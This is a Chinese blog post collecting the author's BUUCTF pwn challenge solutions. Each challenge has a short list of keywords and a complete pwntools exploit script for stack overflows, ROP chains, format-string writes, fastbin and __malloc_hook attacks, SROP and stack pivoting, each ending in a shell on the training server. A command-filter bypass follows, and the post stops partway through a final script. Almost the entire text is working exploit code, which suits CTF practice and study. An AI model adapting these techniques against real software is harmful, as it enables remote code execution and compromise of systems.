码迷,mamicode.com
首页 > 其他好文 > 详细

Buuctf刷题:部分

时间:2020-06-25 15:37:03      阅读:219      评论:0      收藏:0      [点我收藏+]

标签:note   exe   lookup   rmi   move   split   recv   不用   大小   

get_started_3dsctf_2016

关键词:ROP链、栈溢出、mprotect()函数

可参考文章(优质): https://www.cnblogs.com/lyxf/p/12113401.html

#!python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context.log_level = ‘debug‘
#context.arch = ‘i386‘
elf = ELF(‘./get_started_3dsctf_2016‘)
catflag = 0x080489B8
pop3_addr = 0x080509a5
main_addr = 0x08048A20
# mprotect_addr = 0x0806EC80
mprotect_addr = elf.sym[‘mprotect‘]
read_addr = elf.sym[‘read‘]
write_got_plt = 0x080EB000
bss_addr = 0x080ea000

sh = 0
lib = 0
def pwn(ip,port,debug):
    global sh
    global lib
    # start_addr  = write_got_plt
    start_addr = bss_addr
    addr_len = 0x1000
    prot_rwx = 0x4+0x2+0x1

    if debug == 1:
        sh = process(‘./get_started_3dsctf_2016‘)
    else:
        sh = remote(ip,port)
    # payload = ‘a‘*0x38 + p32(catflag)
    # sh.sendline(payload)
    payload = ‘‘
    payload +=‘a‘*0x38 + p32(mprotect_addr)
    payload += p32(pop3_addr) + p32(start_addr) + p32(addr_len) + p32(prot_rwx)
    payload += p32(read_addr) + p32(pop3_addr) + p32(0) + p32(start_addr) + p32(0x100)
    payload += p32(start_addr)
    sh.sendline(payload)
    shellcode = asm(shellcraft.sh(),arch = ‘i386‘,os = ‘linux‘)
    sh.sendline(shellcode)
    sh.interactive()

if __name__ == ‘__main__‘:
    pwn(‘node3.buuoj.cn‘,26297,0)

[第五空间2019 决赛]PWN5

关键词:格式化字符串漏洞

#!python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context.log_level = ‘debug‘
context.arch = ‘amd64‘
elf = ELF(‘./pwn‘)
sh = 0
lib = 0
def pwn(ip,port,debug):
    global sh
    global lib
    if debug == 1:
        sh = process(‘./pwn‘)
    else:
        sh = remote(ip,port)
    unk_804C044_addr = 0x0804C044
    ‘‘‘
    system_addr = 0x08049080
    read_addr = elf.got[‘read‘]
    atoi_addr = elf.got[‘atoi‘]
    offset = 10
    sh.recvuntil(‘name:‘)
    payload1 = fmtstr_payload(offset,{atoi_addr,system_addr})
    sh.sendline(payload1)
    sh.recvuntil(‘passwd:‘)
    sh.sendline(‘/bin/sh\x00‘)
    ‘‘‘
    payload2 = p32(unk_804C044_addr) + ‘%10$n‘
    sh.recvuntil(‘name:‘)
    sh.sendline(payload2)
    sh.recvuntil(‘passwd:‘)
    sh.sendline(str(0x00000004))

    sh.interactive()
if __name__ == ‘__main__‘:
    pwn(‘node3.buuoj.cn‘,28821,0)

[BJDCTF 2nd]r2t3

关键词:整数溢出、栈溢出

#!python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context.log_level = ‘debug‘
context.arch = ‘amd64‘
elf = ELF(‘./r2t3‘)
sh = 0
lib = 0
def pwn(ip,port,debug):
    global sh
    global lib
    if debug == 1:
        sh = process(‘./r2t3‘)
    else:
        sh = remote(ip,port)
    system_addr = 0x0804858B
    payload = (‘a‘*0x11 + ‘a‘*0x4 +p32(system_addr)).ljust(260,‘a‘)
    sh.recvuntil(‘name:\n‘)
    sh.sendline(payload)
    sh.interactive()

if __name__ == ‘__main__‘:
    pwn(‘node3.buuoj.cn‘,28216,0)

ciscn_2019_n_8

关键词:栈溢出

#!python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context.log_level = ‘debug‘
context.arch = ‘amd64‘
elf = ELF(‘./ciscn_2019_n_8‘)
sh = 0
lib = 0
def pwn(ip,port,debug):
    global sh
    global lib
    if debug == 1:
        sh = process(‘./ciscn_2019_n_8‘)
    else:
        sh = remote(ip,port)
    sh.recvuntil(‘name?‘)
    sh.sendline(‘a‘*13*4 + p64(0x11)+‘bbbb‘)
    sh.interactive()

if __name__ == ‘__main__‘:
    pwn(‘node3.buuoj.cn‘,29708,0)

not_the_same_3dsctf_2016

关键词:栈溢出、ROP链、mprotect

#!python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context.log_level = ‘debug‘
context.arch = ‘i386‘
elf = ELF(‘./not_the_same_3dsctf_2016‘)
sh = 0
lib = 0
def pwn(ip,port,debug):
    global sh
    global lib
    if debug == 1:
        sh = process(‘./not_the_same_3dsctf_2016‘)
    else:
        sh = remote(ip,port)
    
    pop3_addr = 0x0809e3e5
    # flag_addr = 0x080489A0
    read_addr = elf.sym[‘read‘]
    mprotect_addr = elf.sym[‘mprotect‘]
    start_addr = 0x080ea000
    addr_len = 0x1000
    addr_rwx = 0x7
    bss_addr = 0x080EBF80
    # main_addr = elf.sym[‘main‘]

    payload = ‘a‘*0x2D + p32(mprotect_addr)
    payload += p32(pop3_addr) + p32(start_addr) + p32(addr_len) + p32(addr_rwx)
    payload += p32(read_addr) + p32(pop3_addr) + p32(0) + p32(start_addr) + p32(0x200)
    payload += p32(start_addr) 
    sh.sendline(payload)
    shellcode = asm(shellcraft.sh(),arch = ‘i386‘,os = ‘linux‘)
    sh.sendline(shellcode)

    sh.interactive()

if __name__ == ‘__main__‘:
    pwn(‘node3.buuoj.cn‘,25323,0)

jarvisoj_level0

关键词:栈溢出

#!python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context.log_level = ‘debug‘
context.arch = ‘amd64‘
elf = ELF(‘./level0‘)
sh = 0
lib = 0
def pwn(ip,port,debug):
    global sh
    global lib
    if debug == 1:
        sh = process(‘./level0‘)
    else:
        sh = remote(ip,port)
    system_addr = 0x0000000000400596
    payload = ‘A‘*0x88 + p64(system_addr)
    sh.sendline(payload)
    sh.interactive()

if __name__ == ‘__main__‘:
    pwn(‘node3.buuoj.cn‘,27804,0)

[BJDCTF 2nd]one_gadget

关键词:libc链接、one_gadget

#!python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context.log_level = ‘debug‘
context.arch = ‘amd64‘
elf = ELF(‘./one_gadget‘)
libc = ELF(‘./libc-2.29.so‘)
sh = 0
def pwn(ip,port,debug):
    global sh
    global libc
    if debug == 1:
        sh = process(‘./one_gadget‘)
    else:
        sh = remote(ip,port)
    sh.recvuntil(‘0x‘)
    printf_addr = int(sh.recvn(12),16)
    print ‘-----printf_addr = ‘ + hex(printf_addr)
    libc_base = printf_addr - libc.sym[‘printf‘]
    one_gadget_addr = 0x106ef8
    system_addr = libc_base + one_gadget_addr
    sh.recvuntil(‘gadget:‘)
    sh.sendline(str(system_addr))
    sh.interactive()

if __name__ == ‘__main__‘:
    pwn(‘node3.buuoj.cn‘,29133,0)

[HarekazeCTF2019]baby_rop

关键词:栈溢出、ROP链

#!python
#coding:utf-8

from pwn import *
from LibcSearcher import *
# context.log_level = ‘debug‘
context.arch = ‘amd64‘
elf = ELF(‘./babyrop‘)
#libc = ELF(‘./‘)
sh = 0
lib = 0
def pwn(ip,port,debug):
    global sh
    global lib
    if debug == 1:
        sh = process(‘./babyrop‘)
    else:
        sh = remote(ip,port)
    bin_sh_addr = 0x0000000000601048
    system_addr = 0x0000000000400490
    pop_rdi_addr = 0x0000000000400683
    offset = 0x10
    payload = ‘a‘*(offset+8) + p64(pop_rdi_addr) + p64(bin_sh_addr) + p64(system_addr) + p64(0x00000000004005D6)
    sh.sendlineafter(‘name?‘,payload)
    sh.interactive()

if __name__ == ‘__main__‘:
    pwn(‘node3.buuoj.cn‘,29851,0)

jarvisoj_level2

关键词:栈溢出

#!python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context.log_level = ‘debug‘
context.arch = ‘i386‘
elf = ELF(‘./level2‘)
#libc = ELF(‘./‘)
sh = 0
lib = 0
def pwn(ip,port,debug):
    global sh
    global lib
    if debug == 1:
        sh = process(‘./level2‘)
    else:
        sh = remote(ip,port)
    system_addr = 0x08048320
    bin_sh_addr = 0x804A024
    offset = 0x88
    payload = ‘a‘*(offset+4) + p32(system_addr) + p32(0x0804849E) + p32(bin_sh_addr)
    sh.sendlineafter(‘Input:\n‘,payload)
    sh.interactive()

if __name__ == ‘__main__‘:
    pwn(‘node3.buuoj.cn‘,25952,0)

babyheap_0ctf_2017

关键词:fastbin attack、malloc_hook函数改写

#!python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context.log_level = ‘debug‘
context.arch = ‘amd64‘
elf = ELF(‘./babyheap_0ctf_2017‘)
libc = ELF(‘./libc-2.23.so‘)
sh = 0
lib = 0

def offset_bin_main_arena(idx):
    word_bytes = context.word_size / 8
    offset = 4  # lock
    offset += 4  # flags
    offset += word_bytes * 10  # offset fastbin
    offset += word_bytes * 2  # top,last_remainder
    offset += idx * 2 * word_bytes  # idx
    offset -= word_bytes * 2  # bin overlap
    return offset

offset_unsortedbin_main_arena = offset_bin_main_arena(0)

def allocate(size):
    sh.recvuntil(‘Command: ‘)
    sh.sendline(‘1‘)
    sh.recvuntil(‘Size: ‘)
    sh.sendline(str(size))

def fill(idx,content):
    sh.recvuntil(‘Command: ‘)
    sh.sendline(‘2‘)
    sh.recvuntil(‘Index: ‘)
    sh.sendline(str(idx))
    sh.recvuntil(‘Size: ‘)
    sh.sendline(str(len(content)))
    sh.recvuntil(‘Content: ‘)
    sh.send(content)

def free(idx):
    sh.recvuntil(‘Command: ‘)
    sh.sendline(‘3‘)
    sh.recvuntil(‘Index: ‘)
    sh.sendline(str(idx))

def dump(idx):
    sh.recvuntil(‘Command: ‘)
    sh.sendline(‘4‘)
    sh.recvuntil(‘Index: ‘)
    sh.sendline(str(idx))
    #sh.recvline()
    # return p.recvline()

def pwn(ip,port,debug):
    global sh
    global lib
    if debug == 1:
        sh = process(‘./babyheap_0ctf_2017‘)
    else:
        sh = remote(ip,port)
    allocate(0x10)#0
    allocate(0x10)#1
    allocate(0x10)#2
    allocate(0x10)#3
    allocate(0x80)#4
    free(2)
    free(1)
    payload1 = 0x10*‘a‘ + p64(0) + p64(0x21) + p8(0x80)
    fill(0,payload1)
    payload2 = 0x10*‘b‘ + p64(0) + p64(0x21)
    fill(3,payload2)
    allocate(0x10) #5--1
    allocate(0x10) #6--2
    payload3 = ‘c‘ * 0x10 + p64(0) + p64(0x91)
    fill(3,payload3)
    allocate(0x80) #7--4
    free(4)
    dump(2)
    sh.recvuntil(‘Content: \n‘)
    unsortedbin_addr = u64(sh.recv(8).strip().ljust(8,‘\x00‘))
    print ‘unsortedbin_addr =‘ + hex(unsortedbin_addr)
    print ‘offset_unsortedbin_main_arena = ‘ + hex(offset_unsortedbin_main_arena)
    main_arena = unsortedbin_addr - offset_unsortedbin_main_arena
    log.success(‘main arena addr: ‘ + hex(main_arena))
    main_arena_offset = 0x3c4b20
    libcbase = main_arena - main_arena_offset
    log.success(‘libcbase = ‘ + hex(libcbase))
    allocate(0x60)#8--4
    free(4)
    fake_chunk_addr = main_arena - 0x33
    print ‘fake_chunk_addr = ‘ + hex(fake_chunk_addr)
    fake_chunk = p64(fake_chunk_addr)
    fill(2,fake_chunk)
    allocate(0x60) #9 --4
    allocate(0x60) #10 --6
    malloc_hook_offset =0x0000000003c4b10
    fake_chunk_offset = 0x3c4b20

    one_gadget_addr = libcbase + 0x4526a
    print ‘ one_gadget_addr = ‘ + hex(one_gadget_addr)

    payload4 = 0x13*‘d‘ + p64(one_gadget_addr)
    fill(6,payload4)
    allocate(0x100)
    sh.interactive()

if __name__ == ‘__main__‘:
    pwn(‘node3.buuoj.cn‘,26418,0)
    # pwn(‘127.0.0.1‘,10001,0)

bjdctf_2020_babystack

关键词:栈溢出

#!python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context.log_level = ‘debug‘
context.arch = ‘amd64‘
# context.arch = ‘i386‘
elf = ELF(‘./bjdctf_2020_babystack‘)
#libc = ELF(‘./bjdctf_2020_babystack‘)
sh = 0
lib = 0
def pwn(ip,port,debug):
    global sh
    global lib
    if debug == 1:
        sh = process(‘./bjdctf_2020_babystack‘)
    else:
        sh = remote(ip,port)
    #gdb.attach(sh)
    system_binsh_addr = 0x0000000004006E6
    offset = 0x10
    payload = offset * ‘a‘ + ‘a‘*8 + p64(system_binsh_addr)
    sh.recvuntil(‘:\n‘)
    sh.sendline(‘100‘)
    sh.recvuntil(‘name?\n‘)
    sh.sendline(payload)
    sh.interactive()

if __name__ == ‘__main__‘:
    pwn(‘node3.buuoj.cn‘,25168,0)

ciscn_2019_s_3

关键词:asm程序、ROP链、SROP链、通用gadget、系统调用59( sys_execve )、系统调用15( sys_rt_sigreturn )、SigreturnFrame的使用

way1:SROP、csu、sys_execve

from pwn import *

p = process(‘./ciscn_s_3‘)
elf = ELF(‘./ciscn_s_3‘)
context.log_level = ‘debug‘

main_addr = elf.symbols[‘main‘]
csu_end = 0x040059A
csu_front = 0x0400580
ret_addr = 0x004003a9
rax_59_ret = 0x04004E2
syscall = 0x400501

#gdb.attach(p,‘b *0x00400589‘)
payload = ‘/bin/sh\x00‘ + ‘A‘*0x8 + p64(main_addr)
p.sendline(payload)
p.recv(0x20)
stack_addr = u64(p.recv(8))
print ‘stack_addr-->‘ + hex(stack_addr)

binsh_addr = stack_addr - 0x138
rax_59 = binsh_addr + 0x10
pop_rdi = 0x04005a3

payload = ‘/bin/sh\x00‘ + ‘A‘*0x8 + p64(rax_59_ret) + p64(csu_end)
payload += p64(0) + p64(1) + p64(rax_59) + p64(0) + p64(0) + p64(0)
payload += p64(csu_front)
payload += ‘a‘*0x38
payload += p64(pop_rdi)
payload += p64(binsh_addr)
payload += p64(syscall)
p.sendline(payload)
p.interactive()
#pause()

way2:ROP、sigreturn

#!python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context.log_level = ‘debug‘
context.arch = ‘amd64‘
# context.arch = ‘i386‘
elf = ELF(‘./ciscn_s_3‘)
#libc = ELF(‘./‘)
sh = 0
lib = 0
def pwn(ip,port,debug):
    global sh
    global lib
    if debug == 1:
        sh = process(‘./ciscn_s_3‘)
    else:
        sh = remote(ip,port)
    main_addr =  0x00000000040051D
    sigret = 0x0000000004004DA
    syscall = 0x000000000400517

    main=0x0004004ED
    sigret=0x4004DA
    sys=0x400517

    pl1=‘/bin/sh\x00‘*2+p64(main)
    sh.send(pl1)
    sh.recv(0x20)
    sh1=u64(sh.recv(8))-280
    print(hex(sh1))

    frame = SigreturnFrame()
    frame.rax = constants.SYS_execve
    frame.rdi = sh1
    frame.rsi = 0
    frame.rdx = 0
    frame.rip = sys

    pl1=‘a‘*16+p64(sigret)+p64(sys)+str(frame)

    ‘‘‘
    def debug(addr):
        raw_input(‘debug:‘)
        gdb.attach(sh, "b *" + addr)
    debug(‘0x400514‘)
    ‘‘‘

    pl2=‘/bin/sh\x00‘*2+p64(sigret)+p64(sys)+str(frame)
    sh.send(pl2)

    sh.interactive() 

    #gdb.attach(sh)
    sh.interactive()

if __name__ == ‘__main__‘:
    pwn(‘node3.buuoj.cn‘,26048,1)
    #pwn(‘127.0.0.1‘,10001,0)

jarvisoj_level2_x64

关键词:64位栈溢出

#!python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context.log_level = ‘debug‘
context.arch = ‘i386‘
elf = ELF(‘./level2_x64‘)
#libc = ELF(‘./‘)
sh = 0
lib = 0
def pwn(ip,port,debug):
    global sh
    global lib
    if debug == 1:
        sh = process(‘./level2_x64‘)
    else:
        sh = remote(ip,port)
    system_addr = 0x0000000004004C0
    bin_sh_addr = 0x000000000600A90
    pop_rdi = 0x00000000004006b3
    offset = 0x80
    payload = ‘a‘*(offset+8) + p64(pop_rdi)+ p64(bin_sh_addr) + p64(system_addr)
    sh.sendlineafter(‘Input:\n‘,payload)
    sh.interactive()

if __name__ == ‘__main__‘:
    pwn(‘node3.buuoj.cn‘,27698,1)

ciscn_2019_n_5

关键词:shellcraft.sh()、.bass段写入、栈溢出

#!python
#coding:utf-8

from pwn import *
import binascii
from LibcSearcher import *
context.log_level = ‘debug‘
context.arch = ‘amd64‘
# context.arch = ‘i386‘
elf = ELF(‘./ciscn_2019_n_5‘)
#libc = ELF(‘./‘)

ip = ‘node3.buuoj.cn‘
port = 27695
debug = 0

if debug == 1:
    p = process(‘./ciscn_2019_n_5‘)
else:
    p = remote(ip,port)

sh = asm(shellcraft.sh())
sh_addr = 0x000000000601080

payload = ‘a‘*0x28
payload += p64(sh_addr)

p.recvuntil(‘name\n‘)
p.sendline(sh)
p.recvuntil(‘me?\n‘)
p.send(payload)
p.interactive()

[HarekazeCTF2019]baby_rop2

关键词:ROP链、LibcSearcher(无libc)、printf函数泄露read地址

#!python
#coding:utf-8

from pwn import *
import binascii
from LibcSearcher import *
context.log_level = ‘debug‘
context.arch = ‘amd64‘
# context.arch = ‘i386‘
elf = ELF(‘./babyrop2‘)
# libc = ELF(‘./libc.so.6‘)

ip = ‘node3.buuoj.cn‘
port = 29490
debug = 0

if debug == 1:
    p = process(‘./babyrop2‘)
else:
    p = remote(ip,port)

read_got = elf.got[‘read‘]
read_plt = elf.plt[‘read‘]
printf_got = elf.got[‘printf‘]
printf_plt = elf.sym[‘printf‘]

main_addr = elf.sym[‘main‘]
pop_rdi = 0x0000000000400733
pop3_ret = 0x000000000040072e
pop_rsi_r15 = 0x0000000000400731
fmt_addr = 0x000000000400770

payload = ‘a‘*0x20+‘b‘*0x8
payload += flat([pop_rdi,fmt_addr,pop_rsi_r15,read_got,0,printf_plt,main_addr])

p.recvuntil(‘name?‘)
p.send(payload)

read_addr = u64(p.recvuntil(‘\x7f‘)[-6:].ljust(8,‘\x00‘))
print ‘read_addr = ‘,hex(read_addr)
libc = LibcSearcher(‘read‘,read_addr)

libc_base = read_addr - libc.dump(‘read‘)
system_addr = libc_base + libc.dump(‘system‘)
bin_sh_addr = libc_base + libc.dump(‘str_bin_sh‘)

payload = ‘a‘*0x28
payload += flat([pop_rdi,bin_sh_addr,system_addr])

p.recvuntil(‘name?‘)
p.send(payload)

#gdb.attach(p)
p.interactive()

ciscn_2019_ne_5

关键词:32位栈溢出、system(‘sh‘)

#!python
#coding:utf-8

from pwn import *
import binascii
from LibcSearcher import *
# context(arch = ‘amd64‘, os = ‘linux‘, endian = ‘little‘)
context(arch = ‘i386‘, os = ‘linux‘, endian = ‘little‘)
context.log_level = ‘debug‘
context.terminal = [‘tmux‘, ‘splitw‘, ‘-h‘]
elf = ELF(‘./ciscn_2019_ne_5‘)
# libc = ELF(‘./libc.so.6‘)

ip = ‘node3.buuoj.cn‘
port = 25731
debug = 0

if debug == 1:
    p = process(‘./ciscn_2019_ne_5‘)
else:
    p = remote(ip,port)


bin_addr = 0x080482ea
system_addr = elf.sym[‘system‘]


payload = (0x48+0x4)*‘a‘ + p32(system_addr) + p32(0xdeadbeef) + p32(bin_addr)

p.recvuntil(‘password:‘)
p.sendline(‘administrator‘)
p.recvuntil(‘Exit\n:‘)
p.sendline(‘1‘)
p.recvuntil(‘info:‘)
p.sendline(payload)
p.recvuntil(‘Exit\n:‘)
p.sendline(‘4‘)
#gdb.attach(p)
p.interactive()

pwn2_sctf_2016

关键词:无符号整型溢出、LibcSearcher、printf函数打印地址、打本地失败、打远程成功

#!python
#coding:utf-8

from pwn import *
import binascii
from LibcSearcher import *
context(arch = ‘amd64‘, os = ‘linux‘, endian = ‘little‘)
# context(arch = ‘i386‘, os = ‘linux‘, endian = ‘little‘)
context.log_level = ‘debug‘
context.terminal = [‘tmux‘, ‘splitw‘, ‘-h‘]
elf = ELF(‘./pwn2_sctf_2016‘)
# libc = ELF(‘./libc‘)

ip = ‘node3.buuoj.cn‘
port = 27942
debug = 0

if debug == 1:
    p = process(‘./pwn2_sctf_2016‘)
else:
    p = remote(ip,port)
    # p = remote(‘127.0.0.1‘,10001)

int_0x80 = 0x80484CD
printf_plt = elf.sym[‘printf‘]
start_addr = 0x80483D0
main_got = elf.got[‘__libc_start_main‘]
main_plt = elf.sym[‘__libc_start_main‘]
print ‘main_pkt =‘,hex(main_plt)

payload = ‘a‘*(0x2c+4) +p32(printf_plt) + p32(start_addr) +  p32(0x80486F8) + p32(main_got)

# payload = ‘a‘*(0x2c+4) + p32(system_addr) + p32(0xdeadbeef) + p32(bin_sh_addr)
# gdb.attach(p)
# raw_input()

p.recvuntil(‘read?‘)
p.sendline(‘-12‘)
p.recvuntil(‘data!\n‘)
p.sendline(payload)
# addr = u32(p.recv()[-8:])
p.recvline()
p.recvuntil(‘said: ‘)
main_addr = u32(p.recv(4))
print ‘main_addr = ‘ , hex(main_addr)

libc = LibcSearcher(‘__libc_start_main‘,main_addr)
libcbase = main_addr - libc.dump(‘__libc_start_main‘)

system_addr = libcbase + libc.dump(‘system‘)
bin_sh_addr = libcbase + libc.dump(‘str_bin_sh‘)
log.success("libcbase:" + hex(libcbase))
log.success("system_addr:" + hex(system_addr))
log.success("bin_sh_addr:" + hex(bin_sh_addr))

payload2 = ‘a‘*(0x2c+4) + p32(system_addr) + p32(start_addr) + p32(bin_sh_addr)

p.recvuntil(‘read?‘)
p.sendline(‘-12‘)
p.recvuntil(‘data!\n‘)
p.sendline(payload2)

p.interactive()

ez_pz_hackover_2016

关键词:给出一个栈地址、动态调试找出栈偏移、\x00截断、shellcraft.sh()、溢出

#!python
#coding:utf-8

from pwn import *
import binascii
from LibcSearcher import *
# context(arch = ‘amd64‘, os = ‘linux‘, endian = ‘little‘)
context(arch = ‘i386‘, os = ‘linux‘, endian = ‘little‘)
context.log_level = ‘debug‘
# context.terminal = [‘tmux‘, ‘splitw‘, ‘-h‘]
elf = ELF(‘./ez_pz_hackover_2016‘)
# libc = ELF(‘./libc.so.6‘)

ip = ‘node3.buuoj.cn‘
port = 28566
debug = 0

if debug == 1:
    p = process(‘./ez_pz_hackover_2016‘)
else:
    p = remote(ip,port)
    # p = remote(‘127.0.0.1‘,10001)

p.recvuntil(‘crash: ‘)
stackaddr = int(p.recv(10),16)
print ‘-------------------‘
print hex(stackaddr)
print ‘-------------------‘
p.recv()

shellcode = asm(shellcraft.sh())
addr = stackaddr - 0x18-4

# gdb.attach(p,‘b *0x08048600‘)

payload = ‘crashme\x00‘ #+ ‘aaaaaaaaaaaaaa‘
payload = payload.ljust(0x16,‘a‘)
payload += ‘bbbb‘ + p32(addr) + shellcode

p.sendline(payload)
print p.recv()
# raw_input()
#gdb.attach(p)
p.interactive()

铁人三项(第五赛区)_2018_rop

关键词:ROP、32位DynELF、栈溢出

#!python
#coding:utf-8

from pwn import *
import binascii
from LibcSearcher import *
# context(arch = ‘amd64‘, os = ‘linux‘, endian = ‘little‘)
context(arch = ‘i386‘, os = ‘linux‘, endian = ‘little‘)
# context.log_level = ‘debug‘
context.terminal = [‘tmux‘, ‘splitw‘, ‘-h‘]
elf = ELF(‘./2018_rop‘)
# libc = ELF(‘./libc.so.6‘)

ip = ‘node3.buuoj.cn‘
port = 28506
debug = 0

if debug == 1:
    p = process(‘./2018_rop‘)
else:
    p = remote(ip,port)
    # p = remote(‘127.0.0.1‘,10001)

start_addr = 0x80483C0
read_plt = elf.sym[‘read‘]
read_got = elf.got[‘read‘]
write_plt = elf.sym[‘write‘]
write_got = elf.got[‘write‘]
main_addr = elf.sym[‘main‘]

bss_addr = elf.sym[‘__bss_start‘]
can_write_addr = 0x804A020

def leak(address):
    count = 0
    data = ‘‘
    payload = ‘a‘*0x88 + ‘bbbb‘ + p32(write_plt) +p32(start_addr) + p32(0x1) + p32(address) + p32(4)
    p.sendline(payload)
    data = p.recv(4)
    log.debug("%#x => %s" % (address, (data or ‘‘).encode(‘hex‘))) #打印搜索的信息
    return data
d = DynELF(leak,elf=elf) 
systemAddress = d.lookup(‘system‘, ‘libc‘) #在libc文件中搜索system函数的地址
print "systemAddress:" + hex(systemAddress)

print ‘-------------------------write "/bin/sh"-------------‘
payload1 = ‘a‘*0x88 + ‘bbbb‘ + p32(read_plt) + p32(start_addr) + p32(0) + p32(bss_addr)+ p32(8)
p.sendline(payload1)
p.sendline(‘/bin/sh‘)

print ‘-------------------------get shell-------------------‘
payload2 = ‘a‘*0x88 + ‘bbbb‘ + p32(systemAddress) + p32(start_addr) + p32(bss_addr)
p.sendline(payload2)
#gdb.attach(p)
p.interactive()

关键词:ROP、LibcSearcher()、栈溢出

#!python
#coding:utf-8

from pwn import *
import binascii
from LibcSearcher import *
# context(arch = ‘amd64‘, os = ‘linux‘, endian = ‘little‘)
context(arch = ‘i386‘, os = ‘linux‘, endian = ‘little‘)
context.log_level = ‘debug‘
context.terminal = [‘tmux‘, ‘splitw‘, ‘-h‘]
elf = ELF(‘./2018_rop‘)
# libc = ELF(‘./libc.so.6‘)

ip = ‘node3.buuoj.cn‘
port = 28506
debug = 0

if debug == 1:
    p = process(‘./2018_rop‘)
else:
    p = remote(ip,port)
    # p = remote(‘127.0.0.1‘,10001)

start_addr = 0x80483C0
read_plt = elf.sym[‘read‘]
read_got = elf.got[‘read‘]
write_plt = elf.sym[‘write‘]
write_got = elf.got[‘write‘]
main_addr = elf.sym[‘main‘]

bss_addr = elf.sym[‘__bss_start‘]
can_write_addr = 0x804A020


payload = ‘a‘*0x88 + ‘bbbb‘ + p32(write_plt) + p32(start_addr) + p32(1) + p32(read_got)+ p32(4)

p.sendline(payload)
read_addr = u32(p.recv(4))
print ‘read_addr =‘,hex(read_addr)

libc = LibcSearcher(‘read‘,read_addr)
libcbase = read_addr - libc.dump(‘read‘)
systemAddress = libcbase + libc.dump(‘system‘)
bin_sh_addr = libcbase + libc.dump(‘str_bin_sh‘)
print ‘libcbase = ‘,hex(libcbase)
print ‘systemAddress = ‘,hex(systemAddress)
print ‘bin_sh_addr = ‘,hex(bin_sh_addr) 

print ‘-------------------------get shell-------------------‘
payload2 = ‘a‘*0x88 + ‘bbbb‘ + p32(systemAddress) + p32(start_addr) + p32(bin_sh_addr)
p.sendline(payload2)
#gdb.attach(p)
p.interactive()

[Black Watch 入群题]PWN

关键词:栈迁移、LibcSearcher(write地址)

#!python
#coding:utf-8

from pwn import *
import binascii
from LibcSearcher import *  
context.log_level = ‘debug‘
# context.arch = ‘amd64‘
context.arch = ‘i386‘
elf = ELF(‘./spwn‘)
libc = ELF(‘./libc‘)

ip = ‘node3.buuoj.cn‘
port = 26048
debug = 1

if debug == 1:
    p = process(‘./spwn‘)
else:
    p = remote(ip,port)

puts_got = elf.got[‘puts‘]
puts_plt = elf.sym[‘puts‘]
read_got = elf.got[‘read‘]
read_plt = elf.sym[‘read‘]
write_plt = elf.sym[‘write‘]
write_got = elf.got[‘write‘]
puts_addr = 0x8048350

execve_offset = 0x3a80c
pop_ebp = 0x080485ab
main_addr = elf.sym[‘main‘]
leave_ret = 0x08048511
bss_addr = 0x0804A300



payload = p32(write_plt) + p32(main_addr) + p32(1)+ p32(write_got) + p32(4)
payload2 = flat([‘a‘*0x18,bss_addr-4,leave_ret])

p.recvuntil(‘name?‘)
p.send(payload)
p.recvuntil(‘say?‘)
p.send(payload2)

write_addr = u32(p.recv(4))
print ‘write_addr = ‘,hex(write_addr)
libc = LibcSearcher(‘write‘,write_addr)
libc_base = write_addr - libc.dump(‘write‘)
system_addr = libc_base + libc.dump(‘system‘)
bin_sh_addr= libc_base + libc.dump(‘str_bin_sh‘)


payload3 = flat([system_addr,main_addr,bin_sh_addr])

p.recvuntil(‘name?‘)
p.sendline(payload3)
p.recvuntil(‘say?‘)
p.send(payload2)

#gdb.attach(p)
p.interactive()

ciscn_2019_es_2

关键词:栈迁移(双read、一printf。溢出空间0x8字节、打印ebp、栈迁移到栈空间,执行system)

#!python
#coding:utf-8

from pwn import *
import binascii
from LibcSearcher import *
context(arch = ‘amd64‘, os = ‘linux‘, endian = ‘little‘)
# context(arch = ‘i386‘, os = ‘linux‘, endian = ‘little‘)
context.log_level = ‘debug‘
context.terminal = [‘tmux‘, ‘splitw‘, ‘-h‘]
elf = ELF(‘./ciscn_2019_es_2‘)
# libc = ELF(‘./libc.so.6‘)

ip = ‘node3.buuoj.cn‘
port = 26048
debug = 1

if debug == 1:
    p = process(‘./ciscn_2019_es_2‘)
else:
    p = remote(ip,port)
    # p = remote(‘127.0.0.1‘,10001)

hack_addr = 0x8048400 
# start_addr = 0x8048450
leave_addr = 0x8048593

payload = ‘a‘*0x24 + ‘bbbb‘

p.recv()
p.send(payload)
p.recvuntil(‘bbbb‘)
ebp_addr = u32(p.recv(4))
ret_addr = u32(p.recv(4))

print hex(ebp_addr)
print hex(ret_addr)

payload2 =‘dddd‘+ p32(hack_addr) + p32(0x12345678) + p32(ebp_addr - 0x28) + ‘/bin/sh\x00‘
payload2 = payload2.ljust(0x28,‘c‘)
payload2 += p32(ebp_addr-0x38) + p32(leave_addr)

p.send(payload2)
p.interactive()

[BJDCTF 2nd]test

关键词:c语言system(x86_64)、x86_64提权、提权、关键单词过滤

#源码:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(){
    char cmd[0x100] = {0};
    puts("Welcome to Pwn-Game by TaQini.");
    puts("Your ID:");
    system("id");
    printf("$ ");
    gets(cmd);
    if( strstr(cmd, "n")
       ||strstr(cmd, "e")
       ||strstr(cmd, "p")
       ||strstr(cmd, "b")
       ||strstr(cmd, "u")
       ||strstr(cmd, "s")
       ||strstr(cmd, "h")
       ||strstr(cmd, "i")
       ||strstr(cmd, "f")
       ||strstr(cmd, "l")
       ||strstr(cmd, "a")
       ||strstr(cmd, "g")
       ||strstr(cmd, "|")
       ||strstr(cmd, "/")
       ||strstr(cmd, "$")
       ||strstr(cmd, "`")
       ||strstr(cmd, "-")
       ||strstr(cmd, "<")
       ||strstr(cmd, ">")
       ||strstr(cmd, ".")){
        exit(0);    
    }else{
        system(cmd);
    }
    return 0;
}
提权命令:x86_64

bjdctf_2020_babyrop

关键词:ROP

#!python
#coding:utf-8

from pwn import *
import binascii
from LibcSearcher import *
context(arch = ‘amd64‘, os = ‘linux‘, endian = ‘little‘)
